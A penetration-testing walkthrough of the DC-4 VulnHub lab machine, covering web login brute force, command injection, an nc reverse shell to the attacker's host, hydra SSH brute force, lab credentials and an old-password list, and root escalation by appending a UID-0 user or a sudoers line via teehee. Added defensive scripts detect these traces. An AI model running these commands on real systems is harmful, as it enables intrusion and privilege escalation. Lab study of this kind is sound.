<h1 id="dc-4靶机渗透">DC-4 target machine penetration test</h1><code>Target machine: https://www.vulnhub.com/entry/dc-4,313/
Difficulty: low
Goal: obtain root privileges
DC-4 is a common virtual target machine for penetration-testing practice that simulates a realistic attack scenario. The workflow below is a summary drawn from several sources:
The target's IP differs between environments (e.g. 192.168.77.143 or 192.168.172.135); adjust the commands to whatever your own scan finds.
Some steps rely on tools such as Burp Suite to intercept requests and modify request parameters.
</code>
<h2 id="一主机发现">1. Host discovery</h2>
<h2 id="nmap主机发现">Host discovery with nmap</h2>
<h3 id="1查看网段">1. Check the local subnet</h3>
<code >ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.65.132  netmask 255.255.255.0  broadcast 192.168.65.255
        inet6 fe80::20c:29ff:fed4:313a  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:d4:31:3a  txqueuelen 1000  (Ethernet)
        RX packets 9  bytes 1313 (1.2 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 24  bytes 4079 (3.9 KiB)
        TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0
</code>
<h3 id="2扫描ip">2. Scan for live hosts</h3>
<code >└─# sudo nmap -sn 192.168.65.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-26 05:17 EDT
Nmap scan report for 192.168.65.1
Host is up (0.00036s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.65.2
Host is up (0.00023s latency).
MAC Address: 00:50:56:FA:BF:D8 (VMware)
Nmap scan report for 192.168.65.148
Host is up (0.00022s latency).
MAC Address: 00:0C:29:7A:03:D1 (VMware)
Nmap scan report for 192.168.65.254
Host is up (0.00020s latency).
MAC Address: 00:50:56:EB:5F:6C (VMware)
Nmap scan report for 192.168.65.132
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.58 seconds
</code>
<p>Since we recognise our own host's IP, the target can be identified as:</p>
<code>192.168.65.148
</code>
<h3 id="3扫描端口">3. Scan ports</h3>
<code >nmap -sT --min-rate 10000 -p- 192.168.65.148
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-26 05:19 EDT
Nmap scan report for 192.168.65.148
Host is up (0.0010s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:7A:03:D1 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 8.11 seconds
</code>
<p><strong>Ports 22 and 80 are open</strong></p>
<p><strong>TCP scan</strong></p>
<code >nmap -sT -sV -sC -O -p80,22 192.168.65.148
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-26 05:21 EDT
Nmap scan report for 192.168.65.148
Host is up (0.00053s latency).
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
|   2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
|   256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_  256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp open  http    nginx 1.15.10
|_http-title: System Tools
|_http-server-header: nginx/1.15.10
MAC Address: 00:0C:29:7A:03:D1 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.28 seconds
</code>
<p><strong>UDP scan</strong></p>
<code >nmap -sU --top-ports 20 192.168.65.148
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-26 05:23 EDT
Nmap scan report for 192.168.65.148
Host is up (0.00042s latency).
PORT STATE SERVICE
53/udp closed domain
67/udp closed dhcps
68/udp open|filtered dhcpc
69/udp closed tftp
123/udp closed ntp
135/udp closed msrpc
137/udp open|filtered netbios-ns
138/udp closed netbios-dgm
139/udp open|filtered netbios-ssn
161/udp open|filtered snmp
162/udp closed snmptrap
445/udp closed microsoft-ds
500/udp open|filtered isakmp
514/udp closed syslog
520/udp open|filtered route
631/udp open|filtered ipp
1434/udp  open|filtered ms-sql-m
1900/udp  open|filtered upnp
4500/udp  closed        nat-t-ike
49152/udp closed unknown
MAC Address: 00:0C:29:7A:03:D1 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 8.19 seconds
</code>
<p><strong>Script scan (vuln category)</strong></p>
<code >nmap --script=vuln -p80 192.168.132.148
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-26 05:25 EDT
Nmap scan report for 192.168.132.148
Host is up (0.00046s latency).
PORT STATE SERVICE
80/tcp filtered http
Nmap done: 1 IP address (1 host up) scanned in 11.77 seconds
</code>
<h2 id="二web渗透">2. Web penetration</h2>
<p><strong>Open the site in a browser</strong></p>
<p><img src="https://img2024.cnblogs.com/blog/3621557/202510/3621557-20251026210319641-131282067.png" alt="image-20251026172723969" loading="lazy"></p>
<p><strong>There is a login form, so we try a dictionary attack</strong></p>
<p><img src="https://img2024.cnblogs.com/blog/3621557/202510/3621557-20251026210320612-14908294.png" alt="image-20251026173430920" loading="lazy"></p>
<h3 id="密码爆破">Password brute force</h3>
<p><strong>Brute-force the password with our own wordlist and watch the response length for the one that differs</strong></p>
<p><img src="https://img2024.cnblogs.com/blog/3621557/202510/3621557-20251026210321072-554888442.png" alt="image-20251026173555682" loading="lazy"></p>
<p>The password is found:</p>
<code>happy
</code>
<p><img src="https://img2024.cnblogs.com/blog/3621557/202510/3621557-20251026210321360-1410990119.png" alt="image-20251026173715360" loading="lazy"></p>
<p>Login succeeds, and the page appears to execute system commands.</p>
<p><img src="https://img2024.cnblogs.com/blog/3621557/202510/3621557-20251026210321698-1693952084.png" alt="image-20251026173746987" loading="lazy"></p>
<p>Intercept the request, change the command, and read /etc/passwd:</p>
<p><img src="https://img2024.cnblogs.com/blog/3621557/202510/3621557-20251026210322063-1167692198.png" alt="image-20251026173859875" loading="lazy"></p>
<code>charles:x:1001:1001:Charles,,,:/home/charles:/bin/bash
这个有bash权限
</code>
<h3 id="命令执行拿shell">Getting a shell via command execution</h3>
<p>We try a reverse shell:</p>
<code>Run on the target through the command-execution field:
nc 192.168.65.132 4444 -e /bin/bash
Listener on the attacking machine:
nc -lvnp 4444
</code>
<p><img src="https://img2024.cnblogs.com/blog/3621557/202510/3621557-20251026210322454-1674748222.png" alt="image-20251026174253482" loading="lazy"></p>
<p>The reverse shell connects back successfully.</p>
<p>Upgrade it to an interactive shell:</p>
<code >python -c "import pty;pty.spawn('/bin/bash')"
</code>
<p>A quick look around the filesystem, starting with the home directory:</p>
<code>cd /home
</code>
<p><img src="https://img2024.cnblogs.com/blog/3621557/202510/3621557-20251026210322883-239742851.png" alt="image-20251026174618100" loading="lazy"></p>
<p>Then look at the contents of each user's directory.</p>
<p><img src="https://img2024.cnblogs.com/blog/3621557/202510/3621557-20251026210323268-392189122.png" alt="image-20251026174803049" loading="lazy"></p>
<p>An old-passwords file turns up in the backups directory under jim's home:</p>
<code >www-data@dc-4:/home/jim/backups$ ls
ls
old-passwords.bak
www-data@dc-4:/home/jim/backups$ cat old-passwords.bak
cat old-passwords.bak
000000
12345
iloveyou
1q2w3e4r5t
1234
123456a
qwertyuiop
monkey
123321
dragon
654321
666666
123
myspace1
a123456
121212
1qaz2wsx
123qwe
123abc
tinkle
target123
gwerty
1g2w3e4r
gwerty123
zag12wsx
7777777
qwerty1
1q2w3e4r
987654321
222222
qwe123
qwerty123
zxcvbnm
555555
112233
fuckyou
asdfghjkl
12345a
123123123
1q2w3e
qazwsx
loveme1
juventus
jennifer1
!~!1
bubbles
samuel
fuckoff
lovers
cheese1
0123456
123asd
999999999
madison
elizabeth1
music
buster1
lauren
david1
tigger1
123qweasd
taylor1
carlos
tinkerbell
samantha1
Sojdlg123aljg
joshua1
poop
stella
myspace123
asdasd5
freedom1
whatever1
xxxxxx
00000
valentina
a1b2c3
741852963
austin
monica
qaz123
lovely1
music1
harley1
family1
spongebob1
steven
nirvana
1234abcd
hellokitty
thomas1
cooper
520520
muffin
christian1
love13
fucku2
arsenal1
lucky7
diablo
apples
george1
babyboy1
crystal
1122334455
player1
aa123456
vfhbyf
forever1
Password
winston
chivas1
sexy
hockey1
1a2b3c4d
pussy
playboy1
stalker
cherry
tweety
toyota
creative
gemini
pretty1
maverick
brittany1
nathan1
letmein1
cameron1
secret1
google1
heaven
martina
murphy
spongebob
uQA9Ebw445
fernando
pretty
startfinding
softball
dolphin1
fuckme
test123
qwerty1234
kobe24
alejandro
adrian
september
aaaaaa1
bubba1
isabella
abc123456
password3
jason1
abcdefg123
loveyou1
shannon
100200
manuel
leonardo
molly1
flowers
123456z
007007
password.
321321
miguel
samsung1
sergey
sweet1
abc1234
windows
qwert123
vfrcbv
poohbear
d123456
school1
badboy
951753
123456c
111
steven1
snoopy1
garfield
YAgjecc826
compaq
candy1
sarah1
qwerty123456
123456l
eminem1
141414
789789
maria
steelers
iloveme1
morgan1
winner
boomer
lolita
nastya
alexis1
carmen
angelo
nicholas1
portugal
precious
jackass1
jonathan1
yfnfif
bitch
tiffany
rabbit
rainbow1
angel123
popcorn
barbara
brandy
starwars1
barney
natalia
jibril04
hiphop
tiffany1
shorty
poohbear1
simone
albert
marlboro
hardcore
cowboys
sydney
alex
scorpio
1234512345
q12345
qq123456
onelove
bond007
abcdefg1
eagles
crystal1
azertyuiop
winter
sexy12
angelina
james
svetlana
fatima
123456k
icecream
popcorn1
</code>
<p>Copy it and save it as <strong>password.txt</strong></p>
<h3 id="使用hydra爆破">Brute force with hydra</h3>
<code >hydra ssh://192.168.65.148 -l jim -P password.txt -vV
</code>
<p><img src="https://img2024.cnblogs.com/blog/3621557/202510/3621557-20251026210323622-638709950.png" alt="image-20251026180122239" loading="lazy"></p>
<p>The brute force succeeds:</p>
<code> host: 192.168.65.148 login: jim password: jibril04
</code>
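<p>Seen from the target's side, a hydra run like the one above leaves a burst of "Failed password" lines in the sshd log, followed by an "Accepted password" line once the right entry is reached. The script below is an added example and is not part of the original walkthrough: a POSIX shell check that counts failed SSH logins per source address and separately flags sources that failed and then succeeded. The log lines are constructed to resemble Debian's /var/log/auth.log (they reuse this lab's addresses but are not real DC-4 logs), and the function names are my own.</p>

```shell
#!/bin/sh
# Added example (not from the original DC-4 walkthrough): spot an SSH
# password-guessing run, like the hydra run above, from the target's sshd log.
# SAMPLE_AUTH_LOG is constructed to resemble Debian's /var/log/auth.log; the
# addresses reuse this page's lab network but the lines are not real DC-4 logs.

SAMPLE_AUTH_LOG='Apr  7 02:20:01 dc-4 sshd[1201]: Failed password for jim from 192.168.65.132 port 40112 ssh2
Apr  7 02:20:01 dc-4 sshd[1203]: Failed password for jim from 192.168.65.132 port 40114 ssh2
Apr  7 02:20:02 dc-4 sshd[1205]: Failed password for invalid user admin from 192.168.65.132 port 40116 ssh2
Apr  7 02:20:02 dc-4 sshd[1207]: Failed password for jim from 192.168.65.132 port 40118 ssh2
Apr  7 02:20:03 dc-4 sshd[1209]: Failed password for jim from 192.168.65.132 port 40120 ssh2
Apr  7 02:20:03 dc-4 sshd[1211]: Accepted password for jim from 192.168.65.132 port 40122 ssh2
Apr  7 02:25:10 dc-4 sshd[1300]: Failed password for jim from 192.168.65.1 port 50001 ssh2
Apr  7 02:30:00 dc-4 sshd[1310]: Accepted publickey for charles from 192.168.65.254 port 50002 ssh2'

# ssh_failures_by_source THRESHOLD: read auth.log lines on stdin and print
# "COUNT IP" for every source with at least THRESHOLD failed logins.
# Both "Failed password for USER" and "... for invalid user USER" count;
# the source address is always the field after "from".
ssh_failures_by_source() {
    threshold=${1:-5}
    awk -v t="$threshold" '
        /sshd\[[0-9]+\]: Failed password for/ {
            for (i = 1; i <= NF; i++) if ($i == "from") { fails[$(i+1)]++; break }
        }
        END { for (ip in fails) if (fails[ip] >= t) print fails[ip], ip }
    ' | sort -rn
}

# success_after_failures: print sources that had at least one failed login
# and later an accepted one, the footprint of a guess that eventually worked.
success_after_failures() {
    awk '
        /sshd\[[0-9]+\]: Failed password for/ {
            for (i = 1; i <= NF; i++) if ($i == "from") { failed[$(i+1)] = 1; break }
        }
        /sshd\[[0-9]+\]: Accepted (password|publickey) for/ {
            for (i = 1; i <= NF; i++) if ($i == "from" && failed[$(i+1)]) { print $(i+1); break }
        }
    ' | sort -u
}

# Stand-alone run; on a real host: ssh_failures_by_source 5 < /var/log/auth.log
printf '%s\n' "$SAMPLE_AUTH_LOG" | ssh_failures_by_source 5   # prints "5 192.168.65.132"
printf '%s\n' "$SAMPLE_AUTH_LOG" | success_after_failures      # prints "192.168.65.132"
```

<p>The single failure from 192.168.65.1 stays below the threshold and is not reported, while the key-based login from 192.168.65.254 has no preceding failure and so is not flagged by the second check; a tool such as fail2ban applies the first rule continuously, and the second is the one worth alerting on because it means a guessed password worked.</p>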
<h3 id="ssh登录"><strong>SSH login</strong></h3>
<code>ssh jim@192.168.65.148
</code>
<p><img src="https://img2024.cnblogs.com/blog/3621557/202510/3621557-20251026210324006-2103683866.png" alt="image-20251026180337525" loading="lazy"></p>
<p>It says I have mail, so let's go and look.</p>
<code >
You have mail.
Last login: Sun Apr  7 02:23:55 2019 from 192.168.0.100
jim@dc-4:~$ ls
backups  mbox  test.sh
jim@dc-4:~$ cd /var/mail
jim@dc-4:/var/mail$ ls
jim
jim@dc-4:/var/mail$ cat jim
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
(envelope-from <charles@dc-4>)
id 1hCjIX-0000kO-Qt
for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O
Hi Jim,
I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.
Password is:^xHhA&hvim0y
See ya,
Charles
</code>
<p>Password obtained:</p>
<code>Password is:^xHhA&hvim0y
See ya,
Charles
</code>
<code>jim@dc-4:/var/mail$ sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
password for jim:
Sorry, user jim may not run sudo on dc-4.
jim@dc-4:/var/mail$
</code>
<p>No sudo rights.</p>
<h3 id="提权">Privilege escalation</h3>
<p>That leaves searching for SUID binaries:</p>
<code>find / -perm -u=s -type f 2>/dev/null
</code>
<p>This recursively searches from the root directory / for regular files (-type f) whose permission bits include the owner's SUID bit (-perm -u=s), and sends all error output, such as permission-denied messages, to /dev/null so it is not shown (2>/dev/null).</p>
<code >jim@dc-4:/var/mail$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/passwd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/sbin/exim4
/bin/mount
/bin/umount
/bin/su
/bin/ping
/home/jim/test.sh
</code>
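<p>The value of that list for a defender is not the list itself but the difference from what the host is supposed to have: /home/jim/test.sh is the one entry above that belongs to no package. The script below is an added example, not part of the original walkthrough: a POSIX shell check that runs the same find expression and reports every setuid file that is absent from a baseline. The baseline is constructed from the output shown on this page, and the demo_tree helper is my own device for exercising the check on a throw-away directory instead of the live filesystem.</p>

```shell
#!/bin/sh
# Added example (not from the original DC-4 walkthrough): compare the setuid
# files on a host with an expected baseline and report anything extra.
# BASELINE is constructed from the `find` output shown on this page, minus
# /home/jim/test.sh, the one entry that belongs to no Debian package.

BASELINE='/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/passwd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/sbin/exim4
/bin/mount
/bin/umount
/bin/su
/bin/ping'

# list_suid ROOT: print every setuid regular file under ROOT, sorted, using
# the same find expression as the walkthrough (find / -perm -u=s -type f).
list_suid() {
    find "$1" -perm -u=s -type f 2>/dev/null | sort
}

# unexpected_suid ROOT: print setuid files under ROOT that are not in BASELINE.
# Paths are reported relative to ROOT, so the same baseline works for the live
# system (ROOT=/) and for a mounted disk image (e.g. ROOT=/mnt/evidence).
unexpected_suid() {
    root=${1%/}
    list_suid "$1" | while IFS= read -r f; do
        rel=${f#"$root"}
        printf '%s\n' "$BASELINE" | grep -qxF -- "$rel" || printf '%s\n' "$rel"
    done
}

# demo_tree: build a throw-away directory tree holding two setuid files, one
# that is in the baseline (/bin/su) and one that is not (/home/jim/test.sh),
# so the check can be exercised without touching the real filesystem.
demo_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/bin" "$d/home/jim"
    : > "$d/bin/su";           chmod 4755 "$d/bin/su"
    : > "$d/home/jim/test.sh"; chmod 4755 "$d/home/jim/test.sh"
    : > "$d/home/jim/notes";   chmod 0644 "$d/home/jim/notes"
    printf '%s\n' "$d"
}

# Stand-alone run: on a real host you would call `unexpected_suid /`.
D=$(demo_tree)
unexpected_suid "$D"      # prints /home/jim/test.sh
rm -rf "$D"
```

<p>Run periodically (or against a forensic image), anything the check prints is either a package upgrade that needs the baseline refreshed or a file that somebody added by hand, which is exactly the case the walkthrough exploits.</p>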
<p><img src="https://img2024.cnblogs.com/blog/3621557/202510/3621557-20251026210324535-267946719.png" alt="image-20251026181116087" loading="lazy"></p>
<p>su is available, so we can switch to charles with the password from the mail.</p>
<p><img src="https://img2024.cnblogs.com/blog/3621557/202510/3621557-20251026210324968-1942921237.png" alt="image-20251026181253556" loading="lazy"></p>
<p>The switch succeeds.</p>
<p><img src="https://img2024.cnblogs.com/blog/3621557/202510/3621557-20251026210325344-1004865647.png" alt="image-20251026181334863" loading="lazy"></p>
<p>From here privilege escalation is straightforward:</p>
<code>echo "aa::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
echo "aacc::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
</code>
<h4 id="方法一teehee提权">Method 1: teehee privilege escalation</h4>
<p>teehee appends content to a file without overwriting what is already there, much like the tee command.</p>
<p>Run sudo -l to view the charles user's sudo rights; the output shows that teehee can be used to escalate.</p>
<p><img src="https://img2024.cnblogs.com/blog/3621557/202510/3621557-20251026210325685-668830447.png" alt="image-20251026205327164" loading="lazy"></p>
<p>Command: echo "M1ke::0:0:::/bin/bash" | sudo teehee -a /etc/passwd</p>
<p>This appends a user named "M1ke" with UID 0, GID 0 and an empty password field to /etc/passwd.</p>
<p><img src="https://img2024.cnblogs.com/blog/3621557/202510/3621557-20251026210326055-425567159.png" alt="image-20251026205402913" loading="lazy"></p>
<p>Switch to the "M1ke" user and the escalation is complete.</p>
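<p>The trick works because nothing on the box checks /etc/passwd for a second UID 0 account or for an empty password field, and both are cheap to detect. The script below is an added example, not part of the original walkthrough: a POSIX shell audit of a passwd file that reports exactly those two conditions, plus a helper listing accounts with a real login shell (the filter the walkthrough applied by eye when it singled out charles). The sample file is constructed: the charles line is the one shown on this page, the M1ke line is the one Method 1 appends, the other entries (including jim's UID) are typical Debian values chosen for the example.</p>

```shell
#!/bin/sh
# Added example (not from the original DC-4 walkthrough): audit an /etc/passwd
# file for what the teehee append leaves behind, a second UID 0 / GID 0 account
# with an empty password field. SAMPLE_PASSWD is constructed: the charles line
# is the one shown on this page, the M1ke line is the one Method 1 appends,
# the rest (jim's UID included) are typical Debian entries made up for the demo.

SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
charles:x:1001:1001:Charles,,,:/home/charles:/bin/bash
jim:x:1002:1002:Jim,,,:/home/jim:/bin/bash
M1ke::0:0:::/bin/bash'

# audit_passwd: read passwd lines on stdin, print one finding per line.
# Clean input produces no output, which makes it easy to run from cron
# and alert on any output at all.
audit_passwd() {
    awk -F: '
        NF != 7                 { print "malformed entry: " $0; next }
        $1 != "root" && $3 == 0 { print "extra UID 0 account: " $1 }
        $2 == ""                { print "empty password field: " $1 }
        $1 != "root" && $4 == 0 { print "extra GID 0 account: " $1 }
    '
}

# login_shells: list accounts whose shell is not nologin/false, i.e. the
# accounts that can actually log in interactively.
login_shells() {
    awk -F: '$7 !~ /(nologin|false)$/ { print $1 }'
}

# Stand-alone run; on a real host: audit_passwd < /etc/passwd
printf '%s\n' "$SAMPLE_PASSWD" | audit_passwd
printf '%s\n' "$SAMPLE_PASSWD" | login_shells
```

<p>On the sample the audit prints three findings, all for M1ke, and nothing for the remaining entries; the same three conditions are what a file-integrity monitor such as AIDE would surface as a changed /etc/passwd, which is the more general control.</p>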
<h4 id="方法二-sudoers提权">Method 2: sudoers privilege escalation</h4>
<p>This method was learned from a video by a Bilibili uploader.</p>
<p>First look at the sudoers file and copy the relevant line:</p>
<p><img src="https://img2024.cnblogs.com/blog/3621557/202510/3621557-20251026210326380-191673642.png" alt="image-20251026205505171" loading="lazy"></p>
<p>As the charles user, run:</p>
<code>echo "%charles ALL=(ALL:ALL) ALL" | sudo teehee -a /etc/sudoers
</code>
<p>This adds the user to sudoers with full rights; the password is still charles's original password.</p>
<p><img src="https://img2024.cnblogs.com/blog/3621557/202510/3621557-20251026210326727-2087584331.png" alt="image-20251026205725530" loading="lazy"></p>
<p>Escalation succeeds.</p>
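<p>Both methods hinge on a sudoers grant that lets an ordinary user run a tee-like helper as root without a password. The script below is an added example, not part of the original walkthrough: a POSIX shell audit that reads sudoers-style lines and reports passwordless grants, grants of tee/teehee-style append helpers, and unrestricted ALL for anyone other than root and the sudo group. The sample file is constructed; the "charles ... NOPASSWD: /usr/bin/teehee" line is my assumption about how the grant behind <code>sudo teehee</code> could look (the page only shows it in a screenshot), and the "%charles" line is the one Method 2 appends.</p>

```shell
#!/bin/sh
# Added example (not from the original DC-4 walkthrough): audit sudoers-style
# lines for grants that make escalation trivial. SAMPLE_SUDOERS is constructed;
# the "charles ... teehee" line is an assumption about how the grant behind
# `sudo teehee` might look, and the "%charles" line is the one Method 2 appends.

SAMPLE_SUDOERS='Defaults env_reset
# User privilege specification
root ALL=(ALL:ALL) ALL
%sudo ALL=(ALL:ALL) ALL
charles ALL=(root) NOPASSWD: /usr/bin/teehee
%charles ALL=(ALL:ALL) ALL'

# audit_sudoers: read sudoers lines on stdin and print one finding per grant
# worth a second look. Comments, Defaults lines and blank lines are skipped.
audit_sudoers() {
    awk '
        /^[ \t]*(#|Defaults)/ || NF == 0 { next }
        # sudo without a password turns any granted binary into a free escalation path
        /NOPASSWD:/ { print "passwordless grant for " $1 ": " $0 }
        # tee and tee-like helpers can append to /etc/passwd or /etc/sudoers as root
        $0 ~ "(^|[ \t/])(tee|teehee)([ \t]|$)" { print "append-to-any-file helper granted to " $1 ": " $0 }
        # unrestricted ALL for anyone beyond root and the sudo group
        $NF == "ALL" && $1 != "root" && $1 != "%sudo" { print "unrestricted ALL for " $1 }
    '
}

# Stand-alone run; on a real host: audit_sudoers < /etc/sudoers
# (also walk /etc/sudoers.d/*, which the walkthrough's method would equally target)
printf '%s\n' "$SAMPLE_SUDOERS" | audit_sudoers
```

<p>On the sample the audit prints three findings: two for the charles line (passwordless, and an append helper) and one for the appended %charles line. The first two are the misconfiguration that made the box solvable; the third is the artefact the attacker leaves behind, so the same check serves both hardening and post-incident review.</p>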